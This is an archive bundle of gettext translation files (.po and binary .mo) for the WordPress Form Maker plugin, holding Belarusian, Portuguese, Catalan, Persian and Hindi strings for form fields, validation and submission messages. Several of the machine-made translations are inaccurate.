"Ваш IP занесены ў чорны спіс. Калі ласка, звярніцеся да адміністратара "
"сайта. "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:325
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:854
msgid "The file exceeds the allowed size of"
msgstr "Размовы перавышае дапушчальны памер"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:344
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:869
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2520
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4233
msgid "Sorry, you are not allowed to upload this type of file."
msgstr "На жаль, вы не можаце загрузіць гэты тып файла."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:365
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:890
msgid "Error, file cannot be moved."
msgstr "Памылка, файл не можа быць перамешчаны."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:743
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:1207
#, php-format
msgid ""
"This field %s requires a unique entry and this value was already submitted."
msgstr ""
"Гэтае поле %s патрабуе унікальную запіс, і гэтая велічыня ўжо прадстаўлены."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:895
#, fuzzy
msgid "Error, file destination does not exist."
msgstr "Памылка, адрас электроннай пошты не быў адпраўлены."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:1434
msgid "Nothing was submitted."
msgstr "Нічога не было прадстаўлена."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2343
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2356
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4047
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4052
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:64
msgid "Your form was successfully submitted."
msgstr "Ваша форма была паспяхова прадстаўлена."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2351
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4043
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:61
msgid "Error, email was not sent."
msgstr "Памылка, адрас электроннай пошты не быў адпраўлены."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:27
msgid "Your email address is already verified."
msgstr "Ваш адрас электроннай пошты ўжо правераны."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:68
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:94
msgid "Your email has been successfully verified."
msgstr "Ваша паведамленне было паспяхова праверана."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:71
msgid "Your email verification has timed out."
msgstr "Ваш адрас электроннай пошты пацверджанне скончыўся."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:99
msgid "Verification link is invalid."
msgstr "Праверка спасылка з'яўляецца несапраўдным."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1034
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1085
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1156
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1203
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1252
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1307
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1379
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1484
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1499
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1601
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1673
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1855
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2022
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2155
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2214
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2290
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2340
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2457
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2505
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2560
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2728
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2918
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3088
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3245
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3386
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3487
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3546
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3601
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3661
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3718
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3778
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3892
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3906
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3921
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3936
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4238
msgid "field is required."
msgstr "поле абавязкова для запаўнення."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1690
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4236
msgid "This is not a valid email address."
msgstr "Гэта не адрас электроннай пошты."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2356
msgid ""
"You cannot select former dates. Choose a date starting from the current one."
msgstr "Вы не можаце выбраць былых даты. Выберыце дату, пачынаючы з бягучага."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2767
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4239
msgid "The"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2767
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4239
msgid "value must be between"
msgstr "значэнне павінна быць паміж "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2893
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2933
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3064
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3101
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3220
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3261
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4212
msgid "Quantity"
msgstr "Колькасць"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3792
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4001
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4002
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4234
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4235
msgid "Your score should be less than"
msgstr "Ваша ацэнка павінна быць не менш за "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4185
msgid "Title"
msgstr "Назва"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4186
msgid "First"
msgstr "Першы"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4187
msgid "Last"
msgstr "Апошнія"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4188
msgid "Middle"
msgstr "Сярэдзіна"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4207
msgid "Area Code"
msgstr "Код зоны"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4208
msgid "Phone Number"
msgstr "Нумар"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4209
msgid "Dollars"
msgstr "даляры "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4210
msgid "Cents"
msgstr "цэнтаў "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4213
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:300
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:586
msgid "From"
msgstr "Ад"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4214
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:305
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:588
msgid "To"
msgstr "Для"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:29
msgid "You have no permission to view submissions."
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:143
msgid "Entries"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:145
msgid "Views"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:147
msgid "Conversion Rate"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:150
msgid "Export to"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:166
msgid "GO"
msgstr "перайсці "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:167
msgid "Reset"
msgstr "скід "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:170
msgid "of"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:170
msgid ""
"submissions are not shown, as the field you sorted by is missing in those "
"submissions."
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:357
msgid "Canceled"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:358
msgid "Cleared"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:359
msgid "Cleared by payment review"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:360
msgid "Completed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:361
msgid "Denied"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:362
msgid "Failed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:363
msgid "Held"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:364
msgid "In progress"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:365
msgid "On hold"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:366
msgid "Paid"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:367
msgid "Partially refunded"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:368
msgid "Pending verification"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:369
msgid "Placed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:370
msgid "Processing"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:371
msgid "Refunded"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:372
msgid "Refused"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:373
msgid "Removed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:374
msgid "Returned"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:375
msgid "Reversed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:376
msgid "Temporary hold"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:377
msgid "Unclaimed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:472
msgid "Show on Map"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:505
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:754
msgid "Total"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:510
msgid "Show Matrix"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:560
msgid "Statistics"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:564
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:568
msgid "Select a Field"
msgstr "Выберыце поле"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:583
msgid "Select a Date"
msgstr "Выберыце Дата"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:594
msgid "Show"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:626
msgid "Please select the field!"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:723
msgid "Choices"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:724
msgid "Percentage"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:725
msgid "Count"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:747
msgid "Unanswered"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:771
msgid "Address"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:779
msgid "Longitude"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:787
msgid "Latitude"
msgstr ""
languages/form_maker-pt_PT.mo000060400000007344152434416630012231 0ustar00��5�Gl��	����������%+03;@EJPT[r{����
��	�7�*9O$SKx"����L'[*�&�%�A�=\o��s
y
�
�
�
	�
�
�
!�
&�
&	*4=@DLRX`gls����
�
����E�>\m�'�P�,
.
5
#:
H^
-�
%�
&�
)"IL#���4%
$#,	5'2 -
10+/&!*.")3(AprilArea CodeAugustCentsCityCountryDecemberDollarsError, email was not sent.Error, file cannot be moved.Error, incorrect Security code.FebruaryFirstFromGOJanuaryJulyJuneLastMarchMayMiddleNothing was submitted.NovemberOctoberPhone NumberPostal / Zip CodeQuantityResetSelect a DateSelect a FieldSeptemberSorry, you are not allowed to upload this type of file.State / Province / RegionStreet AddressStreet Address Line 2TheThe file exceeds the allowed size ofThis field %s requires a unique entry and this value was already submitted.This is not a valid email address.TitleToVerification link is invalid.You cannot select former dates. Choose a date starting from the current one.Your email address is already verified.Your email has been successfully verified.Your email verification has timed out.Your form was successfully submitted.Your ip is blacklisted. Please contact the website administrator.Your score should be less thanfield is required.value must be betweenProject-Id-Version: form_maker
Report-Msgid-Bugs-To: 
POT-Creation-Date: 2015-05-22 17:02+0400
PO-Revision-Date: 2015-05-22 17:03+0400
Last-Translator: 
Language-Team: 
Language: pt
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Poedit-KeywordsList: _;gettext;gettext_noop;__
X-Poedit-Basepath: C:\wamp\www\wordpress\wp-content\plugins\form-maker
X-Generator: Poedit 1.7.6
X-Poedit-SearchPath-0: C:\wamp\www\wordpress\wp-content\plugins\form-maker
AbrilCódigo de áreaAgostoCentsCidade[O PAÍS]DezembroDólaresErro, de e-mail não foi enviado.De erro, arquivo não pode ser movido.De erro, código de segurança errado.Fevereiro$FIRST$.Doir JaneiroJulhoJunhoÚltimoMarçoMaioMédioNada foi apresentado.NovembroOutubroTelefonePostal / Zip CodeQuantidadeRedefinir Escolha uma dataSelecione um campoSetembroDesculpe, você não tem permissão para enviar esse tipo de arquivo.Estado / Província / RegiãoEndereço da RuaRua Linha de endereço 2OO arquivo excede o tamanho permitido deEste campo %s requer uma entrada única e este valor já tiver sido apresentado.Este não é um endereço de e-mail válido.TituloParaLink de verificação é inválido.Você não pode selecionar ex datas. Escolha uma data a partir da atual.O seu endereço de e-mail já foi verificado.Seu e-mail foi verificada com êxito.O seu e-mail de verificação expirou.Seu formulário foi submetido com êxito.O seu IP está na lista negra. Por favor, contate o administrador do siteSua pontuação deve ser inferior acampo obrigatóriovalor deve estar entrelanguages/form_maker-ca.mo000060400000007452152434416630011566 0ustar00��5�Gl��	����������%+03;@EJPT[r{����
��	�7�*9O$SKx"����L'[*�&�%�A�=\o��A
G
T
Z
a
n
u
~
.�
�
'�
�
$)06:AV_g{
�	����?�4FW'[R�7�

&
U>
:�
6�
A&Hdo(��4%
$#,	5'2 -
10+/&!*.")3(AprilArea CodeAugustCentsCityCountryDecemberDollarsError, email was not sent.Error, file cannot be moved.Error, incorrect Security code.FebruaryFirstFromGOJanuaryJulyJuneLastMarchMayMiddleNothing was submitted.NovemberOctoberPhone NumberPostal / Zip CodeQuantityResetSelect a DateSelect a FieldSeptemberSorry, you are not allowed to upload this type of file.State / Province / RegionStreet AddressStreet Address Line 2TheThe file exceeds the allowed size ofThis field %s requires a unique entry and this value was already submitted.This is not a valid email address.TitleToVerification link is invalid.You cannot select former dates. Choose a date starting from the current one.Your email address is already verified.Your email has been successfully verified.Your email verification has timed out.Your form was successfully submitted.Your ip is blacklisted. Please contact the website administrator.Your score should be less thanfield is required.value must be betweenProject-Id-Version: form_maker
Report-Msgid-Bugs-To: 
POT-Creation-Date: 2015-05-22 16:51+0400
PO-Revision-Date: 2015-05-22 16:51+0400
Last-Translator: 
Language-Team: 
Language: ca
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Poedit-KeywordsList: _;gettext;gettext_noop;__
X-Poedit-Basepath: .
X-Generator: Poedit 1.7.6
X-Poedit-SearchPath-0: C:\wamp\www\wordpress\wp-content\plugins\form-maker
AbrilCodi d'àreaAgostcents NomDistingitPaís Desembredòlars Error, el correu electrònic no va ser enviat.Error, l'arxiu no es pot moure.Error, el codi de seguretat incorrecte.FebrerPrimerdes anar GenerJuliolJunyÚltimMarçMaiMitjàRes es va presentar.NovembreOctubreNúmero de telèfonPostal / Codi Postalquantitat restablirSeleccioneu una dataSeleccioneu un camp SetembreHo sentim, no estan autoritzats a pujar aquest tipus de fitxer.Estat / Província / RegióAdreça de carrerCarrer Adreça 2la L'arxiu supera la grandària permès deAquest camp %s requereix d'una entrada única i aquest valor ja s'havia presentat.Això no és una adreça de correu electrònic vàlida.TítolAEnllaç de verificació no és vàlid.No és possible seleccionar les dates anteriors. Trieu una data a partir de l'actual.La seva adreça de correu electrònic ja està verificada.El seu correu electrònic s'ha verificat correctament.La teva adreça de correu electrònic de verificació ha caducat.El formulari s'ha enviat correctament.La seva ip és la llista negra. Si us plau, poseu-vos en contacte amb l'administrador del lloc web. La seva puntuació ha de ser inferior a camp és obligatori.valor ha d'estar entre languages/form_maker-fa_IR.mo000060400000010312152434416630012150 0ustar00��5�Gl��	����������%+03;@EJPT[r{����
��	�7�*9O$SKx"����L'[*�&�%�A�=\o��
A
L
\
c
k
r
{
	�
*�
@�
/�

.9FKQ
^ir�
�'��
���
,D[Uj$���
*
�:
4�

,�=X�L+Nx0�_�2X� �4%
$#,	5'2 -
10+/&!*.")3(AprilArea CodeAugustCentsCityCountryDecemberDollarsError, email was not sent.Error, file cannot be moved.Error, incorrect Security code.FebruaryFirstFromGOJanuaryJulyJuneLastMarchMayMiddleNothing was submitted.NovemberOctoberPhone NumberPostal / Zip CodeQuantityResetSelect a DateSelect a FieldSeptemberSorry, you are not allowed to upload this type of file.State / Province / RegionStreet AddressStreet Address Line 2TheThe file exceeds the allowed size ofThis field %s requires a unique entry and this value was already submitted.This is not a valid email address.TitleToVerification link is invalid.You cannot select former dates. Choose a date starting from the current one.Your email address is already verified.Your email has been successfully verified.Your email verification has timed out.Your form was successfully submitted.Your ip is blacklisted. Please contact the website administrator.Your score should be less thanfield is required.value must be betweenProject-Id-Version: form_maker
Report-Msgid-Bugs-To: 
POT-Creation-Date: 2015-05-22 16:54+0400
PO-Revision-Date: 2015-05-22 16:54+0400
Last-Translator: 
Language-Team: 
Language: fa
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Poedit-KeywordsList: _;gettext;gettext_noop;__
X-Poedit-Basepath: .
X-Generator: Poedit 1.7.6
X-Poedit-SearchPath-0: C:\wamp\www\wordpress\wp-content\plugins\form-maker
آوریلکد منطقهاوتسنت شهرکشوردسامبردلار خطا، ایمیل فرستاده نشد.خطا، فایل را نمی توان منتقل شده است.خطا، کد امنیتی نادرست است.فوریهنخستینازبه ژانویهجولایژوئنواپسینماه مارسمهمتوسطهیچ کس را مشاهده کنید.نوامبراکتبرشماره تلفنپستی / کد پستیمقدارتنظیم مجدد انتخاب تاریخانتخاب درست سپتامبربا عرض پوزش، شما اجازه به آپلود این نوع از فایل.ایالت / استان / منطقهآدرسخط آدرس خیابان 2Theفایل بیش از اندازه مجاز%s در این زمینه نیاز به یک ورودی منحصر به فرد است و این مقدار در حال حاضر ارائه شد.این یک آدرس ایمیل معتبر نیست.عنوانبهپیوند تأیید نامعتبر است.شما می توانید تاریخ های سابق را انتخاب کنید. تاریخ شروع از یک جریان را انتخاب کنید.آدرس پست الکترونیک شما در حال حاضر تأیید شده است.پست الکترونیک شما با موفقیت تایید شده است.تایید پست الکترونیک شما به پایان رسیده است.فرم شما با موفقیت ارسال شد.IP شما در لیست سیاه است. لطفا با مدیر سایت تماس بگیرید.امتیاز شما باید کمتر از است فیلد الزامی است.ارزش باید بین است languages/form_maker-hi_IN.po000060400000062240152434416630012170 0ustar00msgid ""
msgstr ""
"Project-Id-Version: form_maker\n"
"Report-Msgid-Bugs-To: \n"
"POT-Creation-Date: 2015-05-22 16:56+0400\n"
"PO-Revision-Date: 2015-05-22 16:56+0400\n"
"Last-Translator: \n"
"Language-Team: \n"
"Language: hi\n"
"MIME-Version: 1.0\n"
"Content-Type: text/plain; charset=UTF-8\n"
"Content-Transfer-Encoding: 8bit\n"
"X-Poedit-KeywordsList: _;gettext;gettext_noop;__\n"
"X-Poedit-Basepath: .\n"
"X-Generator: Poedit 1.7.6\n"
"X-Poedit-SearchPath-0: C:\\wamp\\www\\wordpress\\wp-content\\plugins\\form-maker\n"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:240
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4201
msgid "Street Address"
msgstr "सड़क का पता "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:243
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4202
msgid "Street Address Line 2"
msgstr "सड़क पता पंक्ति 2"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:246
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4203
msgid "City"
msgstr "शहर"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:249
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4204
msgid "State / Province / Region"
msgstr "राज्य / प्रांत क्षेत्र /"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:252
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4205
msgid "Postal / Zip Code"
msgstr "पोस्टल या ज़िप कोड -"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:255
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4206
msgid "Country"
msgstr "देश"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSelect_data_from_db.php:104
msgid "Connection type"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSelect_data_from_db.php:140
msgid "Type"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4189
msgid "January"
msgstr "जनवरी "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4190
msgid "February"
msgstr "फरवरी "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4191
msgid "March"
msgstr "मार्च "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4192
msgid "April"
msgstr "अप्रैल "

